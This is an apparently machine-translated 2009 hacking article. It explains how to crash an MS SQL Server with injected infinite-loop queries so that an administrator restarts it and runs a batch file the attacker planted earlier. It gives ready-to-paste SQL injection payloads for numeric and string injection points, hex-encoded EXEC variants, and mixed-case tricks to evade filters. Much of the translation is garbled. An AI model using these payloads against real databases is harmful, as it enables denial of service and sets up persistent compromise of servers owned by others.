Let the administrator help you restart the server-the vulnerabilities and early warning-the black bar safety net

2009-06-14T00:00:00
ID MYHACK58:62200923576
Type myhack58
Reporter 佚名
Modified 2009-06-14T00:00:00

Description

Source: dark group

Sometimes, we go through the database backup a batch to the Startup menu, you want the server on the next restart to run our batch processing. But we, Ah, etc., the server is not restarting, what to do? Allow administrator to help us restart it. Oh

The following injection code that makes the server stop responding, or respond very slowly, to achieve better effect, please throw to the injection point after the multi perform a couple of times. Eventually an administrator will restart the server.

Numeric injection points:

;wHiLe 1<9 bEgIn sElEcT cHaR(0) eNd--

The text type of the injection point:

';wHiLe 1<9 bEgIn sElEcT cHaR(0) eNd--

Or to Declare + the EXEC mode to perform:

;dEcLaRe @s vArChAr(8 0 0 0) sEt @s=0x7748694c6520313c3920624567496e2073456c456354206348615228302920654e64 eXeC(@s)--

';dEcLaRe @s vArChAr(8 0 0 0) sEt @s=0x7748694c6520313c3920624567496e2073456c456354206348615228302920654e64 eXeC(@s)--

The above code on the database server, producing an infinite loop cause the server resources are exhausted and thus a denial of service. The administrator will help you restart the server.

Note: The code above is offensive, please use caution. Note: select char(0) can be changed to select power(1.23456,1 0 0) in order to increase the amount of calculation.

-----------------Clip smoke placeholder-------------------- ;wHiLe 1<9 bEgIn sElEcT cHaR(0) eNd-- This sentence means that when 1 small 9 start 0 This inversion of the ASCII code. Because it is a constant established so was a dead circulation. Has been to machine resources exhausted Change character size is in order to bypass website filter anti injection. ;declare @s varchar(8 0 0 0) set @s=0x7748694c6520313c3920624567496e2073456c456354206348615228302920654e64 exec(@s)-- declare @s varchar(8 0 0 0)defined@s varchar type length 8 0 0 0 it. The“wHiLe 1<9 bEgIn sElEcT cHaR(0) eNd”using HEX encoded character value to@s, and then use exec to perform.. The role is also to bypass the website filter anti injection ';wHiLe 1<9 bEgIn sElEcT cHaR(0) eNd-- Plus'because he is the character type of the injection. Anyway, I explain the unclear. select power(1.23456,1 0 0)returns 1. 2 3 4 5 6 1 0 0 th root, do not die when pigs fly the concat function is inside the character difference between the size of the series, benchmark(9 9 9 9 9 9 9 9 9 9 9 9 9,md5('test')report the client to run the elapsed time. Blind maybe useful. I don't know the concat function to attack? w hex encoding 0x77 benchmark(9 9 9 9 9 9 9 9 9 9 9 9 9,md5(0x77) so might be able to bypass anti-injection Scrawl a big cow laugh